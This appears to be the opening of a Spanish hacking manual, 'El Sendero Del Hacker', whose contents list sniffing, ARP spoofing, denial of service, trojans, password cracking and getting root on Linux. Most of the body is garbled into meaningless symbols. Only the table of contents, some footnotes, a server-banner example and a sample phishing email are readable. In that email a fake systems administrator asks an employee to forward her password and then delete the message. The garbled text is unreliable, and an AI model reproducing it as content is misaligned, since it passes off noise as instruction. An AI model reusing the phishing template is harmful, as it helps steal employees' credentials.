El Sendero Del Hacker

El Sendero
Del
Hacker
Por
Bli tzK ri eg

Los Puertos
76
Primera Parte: Preliminares
Servidores DNS
80
Sesin Cliente-Servidor Mediante TCP
82
MAC y ARP
84
ARP Spoofing
87
Escaneadores de Puertos
91
Sistemas de Deteccin de Intrusos
97
Introduccin a Los Sniffers
104
La Suite Dsniff
111
Deteccin de Sniffers
118
Usando Telnet
120
Prueba de Penetracin
125
Manipulacin de Paquetes con Hping2
133
Ataques de Denegacin de Servicio
138
Los Proxies
146
Los Servidores Socks
149
Los Exploits
151
Los Troyanos
152
Contraseas
155
Password Cracking
158
Conseguir el root en Linux
163
Cuentas Shell
169
Introduccin al NetCat
174
La Hora de la Verdad
199
Consejos Finales
206
El Manifiesto Hacker
208
Palabras Finales
209
Referencias
210
Prlogo
Introduccin
Qu es un Hacker?
Computer Underground
10
La Actitud Hacker
12
El Sendero del Hacker
14
Filosofa
16
Reglas De Supervivencia Del Hacker
18
Hackers y Delito
19
Segunda Parte: Aprendiendo el Oficio

Unas Palabras Sobre UNIX y Linux
22
Metodologa del Hacker
39
La Ingeniera Social
43
Lo Ms Bsico Sobre Redes
45
Filosofa Cliente y Servidor
50
Estndares y Normas
51
Capas de Red
52
Protocolo de Ethernet
58
Protocolos De Red (Introduccin)
60
Introduccin al TCP/IP
61
IP (Protocolo de Internet)
63
TCP (Protocolo de Control de Transmisin)
67
Utileras TCP/IP
70
El Protocolo de los Pings: ICMP
74
El Protocolo UDP
75
PRIMERA PARTE
Preliminares
JEFE DE POLICA: Espera un momento. Ests dicindome que este sujeto rob al banco 300 mil dlares, sin usar
una sola arma, sin recurrir a la violencia y sin siquiera presentarse fsicamente al banco y que adems nadie supo del
suceso hasta dos das despus? ESO me ests diciendo imberbe?
ASISTENTE: S, seor.
JEFE DE POLICA: Y qu demonios es ste tipo, una especie de fantasma o un supervillano con poderes
especiales?
ASISTENTE: No, seor. Es un HACKER.

! "
# ! $
#!
% & & !
'
!
" ! '
&
( #!

" (
' )! "
* #
!

" & %
'+,- . / 0
1(! . )2 % ! 3

% )2!
% & 222!!
43 ! / ' 43 !
5 % &
% %!
6 % )2
!
5 % % 43
! "
, ! 7
# 8 #
& & ! %
!
1 %
9! )2 ! '
& )2
./
: ; # ! )2 &
!
1root (Raz) Dcese del directorio inicial de un sistema de archivos. En entornos Unix se refiere tambin al usuario principal o Sper usuario.
% & &
! % )2! < %
(8
! 1 ( 0 #
! + !
% '+,- #
! 5 '+,- # &
,! " == '+,- %
&!

+ # ( :
* ;

& (! . 0
(!
!
5
(
* !

4& +> ? (
( 4! . (
!
. 4 : 4@@; & /
# .(! 4 ,
0! 5
& ! !
.
& 3 = :; !
& .
! " "&
/!
1 4
:# ; : ; !
* ! '
" . ) # #
! 6
!

!
. !
+
)2 %! 5# ,
!
2Un demonio (o daemon) es un proceso que no tiene propietario (es decir, no es ejecutado por ningn usuario en particular) y que se est
ejecutando permanentemente.
4 ) )2
> )AB )AB." )$ :)2 $; )- )+?8 #
. /
!
+ ( #
,! 3
(
C D!
5 +4 1
& & ) %! ?
# 0
!
"
C!
%
! 1 E! "
! &>
F
% ! .
GH GH!
" )

#$ %

#% %
' & I' J (
( !
3Se usarn indistintamente los nombres consola de comandos, lnea de comandos, shell o terminal para indicar los programas que permiten
en Windows o Linux ingresar comandos. En Winxx se usa el programa cmd.exe para traernos una consola y se abre desde el men Inicio
(Start) eligiendo la opcin Ejecutar y en el cuadro de dilogo tecleamos cmd.exe.
M< 1(N
" ( # ! 3#
# ! "
O :4;

! "

!
% ( & ,
# ( % #
!
% (
! . &
# ! ,

! 1 & (

! 4 !
" (
2 #
(!
& ' (
% # (
2 & ! " (
0 F
! % ( 2 #
P(P F (
&!
) *
8
& # (
& ! . : ;
( ! % (
!
% ( # ( &
! /&
(
!
P(P (
!
" ( &
! " ! . ( &
! % > ( K(K !
5 En Espaa se les conoce como ordenadores
% ( 2( 2((
: ;
!
' ( ! . ( !
(
( 2
! ' ' %
+4 # 1( #! 3 !
' ( &
* !
. ( ! . (
!=QRR
& #
!
( !
4 '
" & #
!
S ! % : 0 ;>
+*
? K(K! :" ( IJ;! "
! <
: * *!;
% ( #
!
, *
4
! " (

! ' ( & 12
! " (
0
!

?&! " ! D 0
& 0
! ' *#
" ' 5/% :5 / %;
& ! % #
&
# ! !
5 5/%
!
-
' 5 & # !
# ! " &
? 5 4((!
./
. & 2 ! . ! % # 2
2 & 2
.
! " 2
&
: ; ( 0
& #
! % ( (!
0 12)
" : ; &
? !
10
*
. & * . )
! D (
!
IJ! $ ( (
2 4( !
4 - .% -
)*+,- .*
/,- 0Q ( & &

4 % 7

#
( !
" K#K (! % (
( ( *
(
0 K
K! 5 0 ! % 0
( &
! 8 (

#!
6 Hackeo: lo que es legal y lo que no lo es. 1987
11
% 5 1(
1 (
! 4 ! D
!
( !
! +
&!
(
! 4! % #! 4
F
! 3 ! . &
& ! 5
F
! " # T 2! 5
! " & ! +
& ! 5# #
& !
" >
Para seguir el camino:

observa al maestro
sigue al maestro,
camina con el maestro,
mira a travs del maestro,
convirtete en el maestro.
" #!
! 4 > + :
;! " !
(
>
345 6 &7 &
+ (
! ! %
# & & #
# ! 3 (
!
3 & !
.
(! 3 # (
! .
0
( ! %
!
12
"
& U
0
F #
!
.
! & &
!
8459&

?
! +
!
5 #
& #
! .

&! "
& ! ' *
# #> %
#!
( (
# #
(

#!
0
.
C ! 5
# !
" &!
% &# :
;
!
?0 (
> !
! '
&! .
(
! .
( #
& * (
!
D # ! ? # #
* # 1 1( 0
!
13
" . 1(

+ ,
$ # .

1 :
( .2;! 5
( # * ! 5
(
* ! 1 ( I" /J # #
# !
5 (! M"
( N M/ (
N M 0 (N
" ( *! "
! "
! " & ! D
&! .
# !
1
> ! ?
! %
!
+ & #
! M N 5 #!
! ?0 0
! . /
, !
? ,
! 4
! " ,
* ! " V
/
!
' #
! .
& ! +
# / ! ?
! 1
0 * /!
? ! 1
! .
! .

! + !
. , & !
14
. * &

!!! / ! " / (
# ! ?
& !
'
/! W
$ /! .
# % $
& .
! " /!
. * &
&#
! > M4 #
&
O # ..( % ?N
" !
3 & * * : # ; K
K
/!
' #
( !
.! X% #
Y + *# # !
C ! 3 ! 1
& & !
" ( !
3 ! 5 &
! "
! " !
' 0 &! 3# ! +
! "
# (!
15
7#
" ( ( # & ! +
! ' (

! + 0 &
! D
!
" / # # ! % (
,! "
: 0S ; ! $ ! 3
& *!
3 # * (
% 7 ! 3 &
T . ( 8 (
*! . 0
!
+ I5 (J I1( J! "
! 4 # #

!
+
?4V,! + &
# F!
5 T (

* & < C T & ! ,
! . &
* ! ' (
!
7
5 . ( / #
I + +J *! Z
(! ? ) . F
F (
!
" (

! .
!
% &

! % ( *
!
7Guru (gur) Persona a la que se considera como el sumo manantial de sabidura sobre un determinado tema.
16
: , *
% ( 0 &
2 0
8
!
' ( #

! " & !
5 , 0
! . 0
& 0
!
& , *
% ( *! "
I J ! '
( ! .
! &# !
W (
# ! & 0 (
!
" (! 3

(
!
5 ( (B (
(! 5 ( ! %
( ! 5

# # !
% ( & # ! .0
" . D (
# ! .
0 (
! %
&
!
$ ( #
&! 3
*# !
8Persona que siente un entusiasmo ilimitado por la tecnologa en general y por la Informtica e Internet en particular.
17
D 3 . 3 1(

! "
# ! $
%
&
# & $

# %
&
# ! ' "
(
&
$ ) & $
#& "
) !
$'* *
&
)
+ , -,
. %/& ! $
$ .0
1+0 0( $ ,2'2'0/ * 0(
, #" ') 0 /
+ 3$ . /
*
+ '* & ! !

$ ( &
& "%

" "
+ $ . )4 /
+) ( "
5 (
+#3 " "
* & ! * *

+# % !6 '
) !
&
+#- $2 % 5 5
$ 6
*
. /
18
1( 3
4 & $ & # $ +2>
2 *
! 5 ! +

(!
4

! ? # # ) .
&
!
;)
" &

! +
& ! +
! "
!
1 & 0
& 7)! !
%
/ (! 4
! 5
!

! " # # !
$
! +
! .
! # !
5 !
' I.

J! ! %

0 &
! + !
" # #

# ! 3 # &
( !
? F( # =RRB
+5.5! ' ( I
#
*J!
19

% 0 0 #
! "
*

!
#
! 1
I J! 5 & $
&
!

&! . * ! %
& LBQ I& J
! 3 * !
" 2
! 3 &

! 3 # &
!
" , *
!

?
! 5#
! 3
0 5/% =RRQ!
20
SEGUNDA PARTE
Aprendiendo el Oficio
21
' . '+,- %

3 '+,-
8 ( !
( '+,- ! $
# % !
'+,-
)( #
!
% # '+,- >
<1
$ > ' E=

LC
L$
D5$! "
D5$ :2;!
<=<*>
4 IJ ! "
! .
!
<
$ !
0 & !
4 !
" * !
: ; !
"
'+,- &
# 0 *
!
-
% '+,- >
9!F " ( ! " 2
!
=!F " 0 !
E!F ' !
?
" ( 0
!
" > 2 &
"V.
!
% & '+,-
& ..?"$ 45%%.!
22
0+
" &
!
. # > &
8 &
8 & &
: 2 !; &
8 V
!
" '+,-
>
@0+=+> > !
A0+= +> >
.
& (!
50+= +> >
!
& !
?0+=*+> > ! "

. 4F.
& (!
B 0+ =+> >
.! . &
0 * &
!
B 50+= +>> 4F.!
B ?0+=*+> > .!
<
% & ! "
4' : ; 4'!
%
!

& ! 3
2! " % . ' :;
2
!
" '+,-! ' &
* &
:
;!
5 3/.
( ! '+,-
3/. ) '+,- !
5 !
&&
' &
! " ! 5
!
23
% >

$ :
. .;
C: 4F.;
% : ;

* ! " ! .

. . G4H@G3H
! " 4F. ! 3
'+,-! "
!
% ! "
! 3 ! 5
& ! "
!
+

% >
2+ U "
2 22 U
:&; '+,-! " VV
!
& +4 & #
: %
; > !
22 U [ '+,-
! " ,
: ;
& !
/ ' +

& +
'+,- :
;! 4
& !
% >
+
! '+,-
# ! 3
& &
!

7 '+,-! 5
* * !
+
& 2 2!
+

" !

! .
'+,- &
: ;! 3 &
& !
24
'
3 .! " 5?1! "
>
+ 5 K2K & > VV
+B
5 +/ K2K & > V!
% =OO
# : KVK ;! % #
& # !
1 '+,- 0 0 :
;
C/!
" I\J & # I!J :;8
INJ 3/.
'+,- 3/.!

% '+,- ! '
0! %
#! 5

: & &
# ;!
' ! %
! % & !
,<> K K : ;
! % KK
& 2 24 .
! 1
! "
!
;& DEF
. & '+,-
# & ! 1

&! " > V V V V VV VV!

4 K!K :; K!!K : ;! 4
!
" K!K ! 3 & 2&
42 2&!
" K!!K ! . &
& 222 442&2&4
22&2&4 !
25
D
'+,- % ! 4
VV!
! +0 : ;
! " F F
! ?

8
! ' *
!
D
" '+,- K

K ! "
! 4
C+'V% & !
! ? ! > # ! '
# !

& ! 5 , ! ,
& ! 4
*
0
! . ! 4
* !
' % 43 #
%

!
)

? & %
! "
& ! 3
*! * :
;
! " &
!
? !
%
0
: # V;!
' > &! %
: ; *
* 0 ! 5#
* & 8 *
0 &!
' * & #
> !
26
. 5 >
]/>^_ F 3V%
G55 = E=B =RRBF9RF9E 9O>99 !
2FF 9S 9RLR =RRBF9=F=Q RA>=A !!
F2FF 9 LA9= 9A=QFR9F9S RS>O9 % 43 %!
F2FF 9 9=9ELL 9A=QFR9F=O RS>O= %,+'-F'+,-FR9!
F2FF 9 EOE=B 9A=QFR9F=E RR>RQ . .!
. ! "
! "
5 !
5 ! 4 G
0 ! "
*8
*
!
" KK
:; ! % G :2;
& :"; ! '

! 5# 0 & >
F2FF 9 =BS= T =L =RR=
" ! . * *
! > 2
&! " &
&!
" ! % 2 >
# ! .
KK ! % 2
8 # !
% 0 KK
F !
#
# !
4 & &2
&2
8
# F V!
> M
N " ! & 2
, F
! " + !
27
DEF

" '+,- =RR
& %! "
0 & :4 4@@ !;
'+,- !

+ ! 4
# & ! %
G"H8 &>
_ F4 !
% ! % #

!
_
" !
'+,- 0 0 0!
0H)&
% '+,-
! % >
à à `=a Èa
. >
" ! % :
; & ! 3
'+,- # :F;
!
. &
& >
_ F !
%
! %
!
"&>
E
5
I4 E4*
E5I4 !
% &
'+,- %!
28
5 '+,-! 1
'+,- # >
./. ' . . $
3,C,?5% ' 4
.C, , . C
# * ! %
# %! 5# !
5
: %;

! ' :
0; ! "
!
^_
]/>^_
3 ! / ! .
!
4 &G ! +
0 2!
_ 2
VV
' + #! .
#8 0 !
_
5 >
_
4

!
. & >
_
5 # K\K! 3
\ :
;>
_ \

+ :0 0
0;!
29
' & 5 >
_ U =
? : ;
!
" & >
_
6 #>
_ \

!
. ! " & >
_
5> +0 0 !

!
" &# >
_ V
. !
* >
_ ( 2
)
" :. '; ! "

: ;

2!
" 0 K*K *
&
! #>
2 !!! KK
!
4 # $ %
]/>^_
2> `# 2a
]/>VVb
" ! .
2 !
! ? KK !
30

2>
] _
2> ` 2 KK a
] _
] _
] _
" 5

#
! " : F;
% ! .
!
" 5 0 2
!
=0D&>
& : ;
2! " %
!
. 2! 3
2! " 2
! ' 9O

2 2 !
" VV >
! % KK
: ;! %

!
1 2 2

! %

! % K K
&
8 # &
#>
_ à
" &
!
+
& #8
: ; 2!
31
+
!
b FD 5
4
% FD 2! 5
4
0 ! " 0
* * !
4 8

! 5 &>
" L 9RR FF !
" O 9R9 F &!
" Q 99R 2F !
" S 999 2 &!
% & :; 8
! 5# & # >
_ QLR
" #
* 0 !
0
54 D KK
K&K
& # 0 O! 5
# 0 S! 4
FD
& !
' 0 SOO
* ! % 2+2
SOR & !
4
! 6 &
! .
!

' 0 * & : ;
0
& @ &>
_ @ c!
" 0 0!
" #>
_ 5
4
3 5 :; :; :!; 4 !
@ F * !

4 :; 2 :; :&!;
32
"&>
_ @2
_ F
_ @
"
!
" !
" * &!
$ 0
# !
E ' ;
4
! D 2
! " #!
, 2 %
2 & !
<( E '
5 2
! " %> D$ 3"

?C[ "
',%3! % F
% 2

! % K K
!!! 5#
D$ 3"

2 *
0 !
4
! "
!
"
! 5
KK ! %
!
5 ! "
!
#! " &

: ; 2
*

2! " 0
# 2
& K K *!
33
@14!
4 ! "

! 4 0
!
!
" &
D"53$" ,+.?5%% ! :
;>
b F!!
. !! = >
b & F!! =
% KK >
b !V
b (
b (
&
* !

44/ 44/8 &
!

E
&
! 5
8
! " &>
b (
D J67
"
0 !
* ! "
0 %
! . %
! % & !
5
b F
,!
34
00
6 %
* ! 3
!
1 # 2
! " 2
! " 0 0 2
2! % 0
2 !
;
% # !
\! ? #
'+,-!
% :D$ 3"
;
#! # & #
& F : F 3!; 2
# #
! " :F 3"
F D$;
:; &
!
42 7
!
7)<60;
% # : ; VV
VVV
: !V FF
#!; .
+/$
D"! +/$
D"!!6"D.,/+! % !
. /& :/& 4;
" % & #
! "
VV!!
# &>
b VV!!
VV(V
VV-99DQV
VVVFE!9V
VVV
VVV(E
VVV
VVV2
VV
5 #
: ; *
# : #;
! . #
#!
35
&- ) &

5

!
.
:(; &
& &!
/&)/&8
" '+,- 8 /&
/&8! 5 & !
# =
V
!

1 ' (
! & ! "
K0K
! 5
#!
% : = ;
8 ! +
! ! 4

!
D &;
4 %
# =! 5

% > =! 4
!
! % 8 & VV2!
&) &D0 +

>
_ F VV2 H 2!
" & 2! & !
5
_ 2!
_ VV2 2
_
" 2!
2! !
36
= #>

_ = F VV2 H 2! =
_ = 2! =
_ VV2 2
_
&) & &
4
& 8 0
! .
!
0 >
_ ! V
/ !
V! .
>
_ !
!!
V! % # =
# =!
! >
_ !
A
4
!
5 * =
! 4
#
!
#>
_ F!!
_ & F!! =
+ P P P&P =

* 5
_ F F!!\
F2FFFFF 9 T T EE9=EQ 9B RE>99
F!! =
F2FFFFF 9 T T LSSREE 9B RE>9E
F!!
37
4 =
8 =
!
0 >
_ F!!
_ & F!! =
. P P P&P =

.
& 8 &>
_ & F!! = !
_ !
!
& !
" # V
)2 ! % % .,
8 !

!
222!2!
_ !
_ !
4
! + #
!
" # '+,- %! , %
&

& !
38
$# 1(

?
! ' # !
(! ? 2
2 A ! 1
#
! 5
( ! 5 #
&!
% & &! '
2 ! ! .
#
! 7? :7 ? ? 5;
,
! .
=9! 3 , 7?
F! % 7? I 7?J :7? ; &
IJ
! " 7?
! ' 0 7? 2
!
" # & ! D

! 1 !

# &!

! .
!
?

!
345@9- E7 '
' 0
! 3
, ! " & &
!
$ 0
! % +,4 :+2( , 4;
! !
! ! 4 +,4
0
#! " # ! %
0 ! " . 5 #
,!
9 Warez Esta palabra se aplica en dos sentidos: uno como la copias piratas de los programas; el otro alude a las versiones de software
protegido a las que se ha retirado fraudulentamente la proteccin. Es plural en jerga de ware (Mercancas).
39
4

! 5 >
& % #
! " 0 (!

+ !
( "
0 ! 5#
!
7 ' , !
! !
29R ! :>VV222!!VcV2!;
!
.
!
, !
! / & 0 #
2! ,
! "

# !
$ 2
& ! "
! %
! "
(
#
! '
: ; ! %

!
845
+ # : A9;!
C
! 4
! " !
1 > '
!
K45E 7 ' 0

%
! "
!
10Quin es. Programa Internet, poco utilizado tras la aparicin del WWW y de los motores de bsqueda, que permite a los usuarios hacer
bsquedas en una base de datos sobre personas y otras entidades, tales como dominios, redes y sistemas centrales, que fueron al inicio
mantenidos en DDN NIC. La informacin sobre personas muestra el nombre, la direccin, numero de telfono y direccin electrnica, etc.
40
L45E 7 ' 0

5 :
0 )2 ';
& !
2 ! ! '
. / 2 #
, &! " !
" I) J 2
2! 5 2 >
The site www.xxxxx.com is running Apache/1.3.27 (unix) mod_bwprotect/0.2
Mod_log_bytes/1.2 mod_bwlimted/1.0 PHP/4.3.1 frontpage/5.0.2.2510
Mod _ssl/2.8.12 OpenSSL/.09.6b on Linux
" & +( 2 (
& ,
,! , !
" ! >
The site www.xxxxx.com is running Apache on Linux
%
0!
/ 0 ! 5
& C
! 5
!

IJ >
! ! ! + & #
2! " , 2> ,,. :
$; 5 : % )2;!
M45 1 )17 '
# .
:
; ! " D #
! &> (
&
N4517 ' &
+ # ! <
99 !
0 # !
' 2

2 !
11 Los bugs (errores de programacin) y ciertas vulnerabilidades severas pueden a veces solucionarse con un software especial,
denominado Patch (Parche), que evita el problema o alivia de algn modo sus efectos.
41
O45 & ' B=B >

" :;
! '
! '
&
! " ?4V,
& 0 2 ,! 4
# !
5 ! "
2 #
,! '
* !
. , # 2
, #!
P45 0 7
5# ! .

!
!
Q4517 ' !G= 7>
% 72
! 3 !
3R45B
' 0 ' E=E0>
/ ! ' ,3.
#
!
3345 & ' < '
"
! 1
!
3845 S
3 0
# 0 *
! . # ! $
* * !
3K45E ' ' 0

% 3 . :3.; 3 . 3 :33.;
! ' & 33.
2! ' & 3. F! $
!

" ! 1
0!
42
% ,# .

% # :. ";
(! " !
3
! .
0 # ! " &
( 0
!
+ 0 0 (! ' (

! + &

! "
0 #
( !
5 #
2 : #; 2 : ;! %
! 1

! "

! "
# ! $
!
3 2 ! 4
2 . /
! 1 2

!
5 ,# .! "
!
" !
% #
#! "
0

2F2
# !
&
# ! +
!

% # ! +
! "

!
43
% & !
0
& 0! "
(
* ! . &
&
! %
! "
! 4 & # !
% ! 5
0
# & ! "
!
' (
! 3
!
! .
>
From: administrador@empresavictima.com
To: isabeltontamevi@empresavictima.com
Saludos Isa, soy Mefrunzo del Hoyo, de aqu de Sistemas. Me parece que alguien
nos ha estado espiando. El programa detector de espas se activ y aunque no se
menciona nada en el reporte, pues no me fo. Voy a cambiar todas las contraseas
del personal y necesito las antiguas para colocar las nuevas. Por favor envame tu
contrasea a esta direccin de correo (slo dale un Forward.) A vuelta de correo
te enviar una nueva para que puedas memorizarla. Despus de que lo hagas, haz
favor de eliminar este correo inmediatamente para mayor seguridad.
Gracias.

!
! 5# ! . 0 #
& &!
1 ! 5
#! "
# IJ! 7 I1 J I
J # ! "
!
4 &
& ! " &
!
1 ! 4 *#
#
! 5 I # J! 5
! "
*# 5 / :5/%;!
44
% $
. D
% , #!
" & , *
& &!
B
% & #
! % ! %
&
! " & &
0 ! % #
*!
' > 2 2
2 ! " 2
:
#; : !; ' 2
F9=!
% #

! / 2
K K : # =!; "
# # &
!
, G B
" 2
:; ! "
> # !
; '> 1 # >
! %
! % & : ; #
! ' !
' & ! . #
!
12Las palabras Cliente y Servidor se van a usar en este documento muy frecuentemente, as que hay que familiarizarse con ambas.
45
%
& ! 5
:;!
"
!
! 4 : ; *
& !
> ' ! 3 *
!
! 3 :%5+ % 5
+2( FD d %; :$5+ $ 5 +2(;
:)5+ ) 5 +2(;!

D (
*
C :C ;! . !
,
%5+!
<
/ D d $ %5+ )5+!
% %5+ *!
0
! ' $5+ &
! + $5+ : #
# ; *
!
.
. # !
" 0 !
! 4
& !
" )5+ #
:;! .
! 4 #

#
#! ' && :

;!
' )5+ ! 4
# ! ? #
#
!
0
!
46
B E6

! "
! , & !
,
1 1 .
?4V,
! 5

:" .;! % &
& ! %
? ))) 7?! % :? F ;
0 &!
&;
% # ! 1
# !
: ;
G + :; #
!
% #
! 4 # & &!
5# #
#!
< '
5 ,
53.% 5 3 . % :%# . 5 3;!
! 53.% # 3.%
!
! .
!
47
% 53.% ELRR 1 :
; !
.
!
"
, ! %
!
53.% # # ! " *#
53.%! "
!
% 53.% & $ =OQ & :
& $E; 9=B :#
?;
* !
" 0 , 9Re
!
@
% :;
IJ #
! ' 9 R

!
+ $ $!
9 $ f 8
9 $f 9R=L :B9A= ;
3 9 B !
'
(DB
% #
# U # 3
1
:4
4 ;!
4 ! "
* ! "
!
4 # *
* ! .
#! 1
0 ! . ! %
!
0 : ;
! ' #
0! .

!
48
" #
:?4V, &;
#
: !; 7
!
. /., ,./ S
:& ;
! 4
* : & ;
!
.
: 29E;
#
!
-
% ! 5#
! . 9RR
&
!
. *
! .
! %
!
'0 0B
4
! $
&
& &
&! /
! 50
M
N
% &
! "

0 ! "
# 0 !
"
&! %
*#
! &
$
# &
! 5
: 2;
!
13(Pasarela) Punto de una red que acta como punto de entrada a otra red.
49
7# 4 .

, %5+ : ;
! 3 ! % #
4F. 0
$ %2 5!
"
&!
% >
& ! 4
& ! %
&
! $
!
% F

8 !
" # & ! %

! 5 & :2(;
! . 0 & ?
& # & &!
" 0 :;
:;!
4 F &
! "
! "
!
1
!

& !
3 #
?4V, !
50
" +

4 $3P 4 T!
* ! . ! "

! Z
&! .
=!O !
" & ! .

!
. 0
8 ) % $
53.% M ,N "
" +! 5 *
#
# ! .# & ! %
!
3 M # *
,
N % # 0
#! 5 #
% $! 4 #
* ! /
# * #
!
"
! . # !
! %

! + & #
!
& 'B
! $ *#
,

: # #
;!
" 0 *# )2

) C !
5 &

! %
# !
51
4 D
E '
< 0E4 % ,./ 9ABE
/., :/ . ,;
S # I & J!
5 # 0 ,
* ! . I J!
,./ :, / . F / , " ;
" 9ALQ
! "
# !
/., / . , :, . 5;! "
* ,./ &
!
% &> 1

! 5
! 5
#
! "
4& + ! . &
!
& &! %

! "

& #
!
" & I J ! .
!
& : ) / /;
IJ
!
!
? &
! .

!
5 & ! . & &
& # *
!
52
% ( &
# ! 3
> & !!! & !
& &
*! &
3 1!
&
& ! )2 ! %
! "
& & ! Z

F )2F % !
" /., S #
& * ! "
$ D /., :/ . , F#41
/ ;
!
" /., > %
! 4 ! %
! %
! 7 ! Z
&
!
" /.,
& # !

! 3

&
! "
IJ ! 5 &
& ,
!
% >
9!F 4 !
=!F % !
E!F % # &
!
L!F %
* &!
&
" #
!
4 !
53
&!; =+) >

" : ;
!

% *
# 3 3 R!
0
#
!
5# *
# & #!
. !
! %
!
& =*>
% #
! "
: F
;
! %
3.% 4 !

: ; # !
0
%
! D
:0; ! "
& # !
"
0 !
& B =G*>

4 ! '
& -!=O
0
%
!
'
! %
! "
: R 9; !
& #
! 4

"
&
!
" E! ,
# !
54
& &=&>

# 2 !
0
# :&
&!
Z 0 &# ! .
*
!
%
#
! . # !
&
! " 2 2 &
0 :(;
#
& :+,4 +2( , 4 & " ;!
"
! .
0 # 0
0!
# &
#! 5 !
& 0'=0>

! 5
!
0
I J! ?
0 !
'
& 0 ! . #

!
' & ! %
! .
: # ;
!
' 5 :(;!
! 5
! .
#! / ! 4

9 ! 4
#
# !

0 :( ;!
. # # IJ
# !
55
& '=>

I J I J !
0
5.4,,9L
=OQ 0
#!
%
& 0 &
! 5 #
!
' & ! % #
8
! "

!
% :
& 5.4,, '+,4/3"; ! 4

& ! % &

!
. #
!
& & '=&& >

! 4 !
0
!
% & #
& ! "
#
& ! 4
I&J ?>
IM<g g NJ
, &

! %
!
/ ! %

# ! %
! " &
& 0
!
14American Standard Code for Information Interchange" (Estndar Americano de Codificacin para el Intercambio de Informacin) Conjunto
de normas de codificacin de caracteres mediante caracteres numricos, de amplia utilizacin en informtica y telecomunicaciones.
56
"
! ? >
0 4 <
!
04< & ,!
' 4< # 0 !
< 7 2E
? # ! "

2"!6#!
/., IJ! & ?4V,
! 3 * &
! % #
!
% ?4V,
& E 4 " & ! %
&
: # ;! %

!
% , :, ;! "
& , ! 5#
! .
?4V, /.,!
& &4 " *
: /.,;! 5#
! " ?4 :? 4
4 ?;

! " '3 :' 3
3 '; ! 5
#!
& & '4 " ?4V,
# ! %
! "
:?"%+"?; :7?; :.$?;! 5
*
:3+.;8 1?? ) ) ) !
" &
0 2 ! ,
DTFLO : ; ! "
#> DTFLO

!
57
"

" SR > "! " "
&
! . # :
; ! % & "
! . *
0
!
" # %5+ " 7
0 !
" " : ;
! .

! . ! . & !
5 #!
" @ : ;
! . #
: ;
!
& +
" "! "
+ & " %5+
! %
! '
! %
! 4 #
! "

& %5+!
5 "
5
&
! ?

!
58
+&0G += >

" 2 :; "
2! " 2
$54
# ! "
0 ! "
& 2
&!
" 2 2 $54
2
4
0 !
4 "
! " 2 !
& : &
; 2
& !
"
2 # ! 6
& 2

7 % 3
59

" ! 4
! ?0 !
?0 ! ?0
! 7 !
5 & >
IJ I M N8 IJ I *J!
+
0
!
B!
% D74 :8 9 "
F. 4;! Z 0
,! % D74
9AQS
!
4 ! "
: 1?? 7?;
! 3 # 0
, &
: *;
! "
&
!
?
!
3 : & $!; ? D74
222!F! ! $
D74 !
+ D74P : ; ,
, D74!
1 ! "
?4 & ?4V,
:7?; :.$?9O;
2 :; !
!
15SMTP Simple Mail Transfer Protocol (Protocolo Simple de Transferencia de Correo) Protocolo definido en STD 10, RFC 821, que se usa
para transferir correo electrnico entre computadoras. Es un protocolo de servidor a servidor, de tal manera que para acceder a los mensajes
es preciso utilizar otros protocolos.
60
, ?4V,
?4V, & *
! 7
5D5+"?! % 0

?4V,! ?4V, * #
QR
?4V,!
5

! ?4 , !
3 ?4 , 0
?4V, !
E
4 5D5+"? ?4V,
0 ,! ,
,
?4V, , ,
,!
? ,
?4V,>
D ' 4 :"; %
5D5+"? 0 ! 6
, !
J& 4 :/ 2;
0 &!
0'B4 $ ?
, ! .
! . ?
!
7 +
4 4 7?
, ! 3
!
& 'J 2E
?4V, ! 0
&! ' # # !
# : &
&
&;! .
! "
& & ! " * ?4V,!
?4 #! 3
# ! . &
?4
* !
61
"

# ! ' ?4 #

3 ?4 , #
?4! 5 ?4
! .
! "
,!
% ?4V, > 8
?4 ,
8
# # " # !

% ! '
& ! 4
: &
;! . 0
!
"& 9ORRR
& * ER
ORR ! 4 ! 5
* ! 1

OS O! ?
0 B9 ! "
!
% , ! %
! " # QL
9ORR :9!O ;! 4
, * !
4
& ! "
!
3 *
*! 3 ?4V,!
'
! # " 0 ! "
#
!
62
, : ,;

, :, ; , ! "
, ! ' ?4
& ,! 3
!
'E=E >
' # ! 4
, ,
"!
" , 5!
!4!3! IJ R =OO! "
B =hBf=OQ IJ! " ,
E= & !
" 5 9A= 9R 9S=
9QB R 9Q
& 4 3
!
. ,! .
0 0 # ,
& 9RR!9RR!R!- #
, !
, 0 9A=!9QB!4!3 9S=!9Q!4!3

4 # ,! $
!
" 3 =OO ,
! . !
' QL
& : 0 *;
F !
' ,
& ! " E=
E= & >
" , ! % &
=R ! ?
! 5#

IJ!
63
6 ,>
1'
" ! 5
*
& & !
=E,>
, 1 %! % E= ! " # O
9O !
)&70

? ! ! 5#
! +
: ; #
! .
!
+
% ?! % ! " QOOEQ !
E 7 )!77
, 3 7!
! "%
! ? 0
0 B !
! &
/! 5 ! ' :;
0
!
& &
& 5
! 3
0!!! % ! ,
! " 9
: ;! ' 37 :3P F+
;! "
& ! & D/$
:D / $; # # !
" $7 :$ F$ ;
0! "
!
64
=
>
? 6! " ! .
#
! . 9=B !

! ' !
" ! ?4 '3
! % , D74 9SRR!
" "G")K8"
" "& 2&
. / & 0 !
, + *
4( 4 :. 4;! 6 0
! " ! "
! .
# #
!
" ( &
& & &
! &

&!
% : ;
! % #
!

!
D # &
D #
! 3
,! . D 0 !
4 , ! ,
>
5# 53.% 4 ,
%5+ ! % 0 !
" 4
! 4 > 222!!!
65
, 2 9Q!

222!!
& >
, V
% >
, F
" , : %5+ ;
, ! " ,
! " , 222!2!!
*# ,
! " 4! 3 ?
!
% *#
! 222!2!
, ! /
, 4! "
IJ

! 3
!
' , IJ
? *#
222!!V!
1 , & ! %
# . , :,.
F, . ;! "
OF9O
! % , &
,. !
1 !
16PING Packet INternet Groper (Buscador de Paquetes de Internet) Programa que se utiliza para comprobar si un destino est disponible. El
trmino se utiliza tambin coloquialmente: "Haz un ping al host X a ver si funciona".[Fuente: RFC1208].
66
?4 : 4 ?;

?4 :? 4 ; ,! ' &
,
#! "
# ! "

0
!
?4 & &! " #
! "
! " ?4 0

*
!
' & # #
! % I J #
*
! 3 # ! " #
& #

!
' & ?4 : &
!; ?4
! ?4
0 & #
! " 0 !
" ?4
! 5#
0 =O =O .$?
"F! !
4 ?4 0 E= ! "
%5+ 9R $! " # 0 #
! . 0
:54;!
0
% ?4 ! '
?4 & =R : ;
! " 2 ?4 * 8

<D=<7D>
" # * !
?4 0 QOOEO ,! .
$?' $?'! .
$?'
*!
67
& &-

6 ?4! % ?4 #>
% ! '
!
9
4 ! . & LORR 0
$?' * ?4
